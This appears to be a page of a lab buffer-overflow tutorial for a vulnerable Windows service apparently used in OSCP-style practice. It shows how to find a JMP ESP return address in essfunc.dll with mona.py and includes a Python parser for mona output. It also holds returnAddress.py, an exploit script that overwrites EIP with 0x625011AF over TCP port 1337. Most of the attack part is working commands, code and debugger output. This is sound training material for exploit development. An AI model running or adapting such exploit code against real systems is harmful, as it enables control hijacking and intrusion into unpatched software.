Finding a Return Address

This return address is the value we overwrite EIP with to send execution to where our payload sits: the address of a JMP ESP instruction, which jumps into the stack where the rest of our buffer lands. Mona.py is used for this step as well.


Last updated 3 years ago


Listing all modules

The following mona command lists the modules (the executable and every DLL) loaded into the running process, together with their memory protections. One of them has no protections enabled at all, which is what we need for the next step.

!mona modules

Analyzing Output

Log data, item 12
 Address=0BADF00D
 Message= 0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)

Reading the columns of the output (Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll), essfunc.dll has every protection set to False: it is never rebased or randomized, has no SafeSEH table and no DEP/NX compatibility flag. An address inside it will therefore be the same on every run, which is what makes it a usable return address.

Locating the JMP ESP opcode

Generating OpCode

The next step is to generate the opcode bytes for "JMP ESP" so that we can search for them in essfunc.dll. We will be using msf-nasm_shell for this: typing jmp esp at its prompt assembles to the two bytes FF E4, which is what the mona search below looks for.

msf-nasm_shell

Finding JMP ESP

!mona find -s "\xff\xe4" -m "essfunc.dll"
Log data, item 11
 Address=625011AF
 Message=  0x625011af : "\xff\xe4" |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)

0x625011AF
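To make the column reading above explicit, here is an added example (not part of the original page or of mona) that parses a mona modules line in the format shown, reports whether any mitigation is enabled, packs the address as little-endian the way the script further down does, and checks that the address lies inside the module and contains no bad characters. The sample line and the bad-character set (only 0x00) are constructed for the example.

```python
import re
import struct

# Constructed sample in the shape of the "!mona modules" log line shown above.
# Column order: Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Name & Path
MODULE_LINE = ("0x62500000 | 0x62508000 | 0x00008000 | False  | False   | False |  False   | False  "
               "| -1.0- [essfunc.dll] (C:\\Users\\admin\\Desktop\\vulnapps\\oscp\\essfunc.dll)")
PROTECTIONS = ("Rebase", "SafeSEH", "ASLR", "NXCompat", "OS Dll")

def parse_module(line):
    """Return (name, base, top, {protection: bool}) for one mona modules line."""
    fields = [f.strip() for f in line.split("|")]
    base, top = int(fields[0], 16), int(fields[1], 16)
    flags = dict(zip(PROTECTIONS, (f == "True" for f in fields[3:8])))
    name = re.search(r"\[([^\]]+)\]", fields[8]).group(1)
    return name, base, top, flags

def unprotected(flags):
    """True only if every mitigation is off: Rebase/ASLR would move the module
    between runs, SafeSEH/NXCompat would block the handler abuse or execution."""
    return not any(flags.values())

def pack_return_address(addr):
    """x86 is little-endian, so 0x625011AF goes on the wire as \\xaf\\x11\\x50\\x62."""
    return struct.pack("<I", addr)

def check_return_address(addr, base, top, badchars=b"\x00"):
    """Sanity checks before relying on an address: it must sit inside the
    module's mapped range and its bytes must not include any bad character."""
    packed = pack_return_address(addr)
    in_module = base <= addr < top
    clean = not any(b in packed for b in badchars)
    return in_module and clean

if __name__ == "__main__":
    name, base, top, flags = parse_module(MODULE_LINE)
    print(name, flags, "unprotected" if unprotected(flags) else "protected")
    print(pack_return_address(0x625011AF), check_return_address(0x625011AF, base, top))
```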

Hitting Offset

Now that we have a return address, we set a breakpoint on it and send the payload to verify that the overwritten EIP really lands on our JMP ESP.

Setting breakpoint

Navigate to 0x625011AF in the debugger's disassembly view, then hit F2 to set the breakpoint.

returnAddress.py

#!/usr/bin/env python3
import socket

try:
    print("\nSending evil buffer...")

    prefix = b"OVERFLOW10 "
    filler = b"A" * 537              # pads up to the saved return address (offset found earlier)
    eip = b"\xaf\x11\x50\x62"        # 0x625011AF, JMP ESP in essfunc.dll, little-endian
    buffer = prefix + filler + eip

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)
    s.close()

    print("\nDone!")

except socket.error:
    print("\nCould not connect!")

Hitting breakpoint

python returnAddress.py

The debugger pauses at the breakpoint on 0x625011AF, confirming that the overwritten EIP sent execution to our JMP ESP.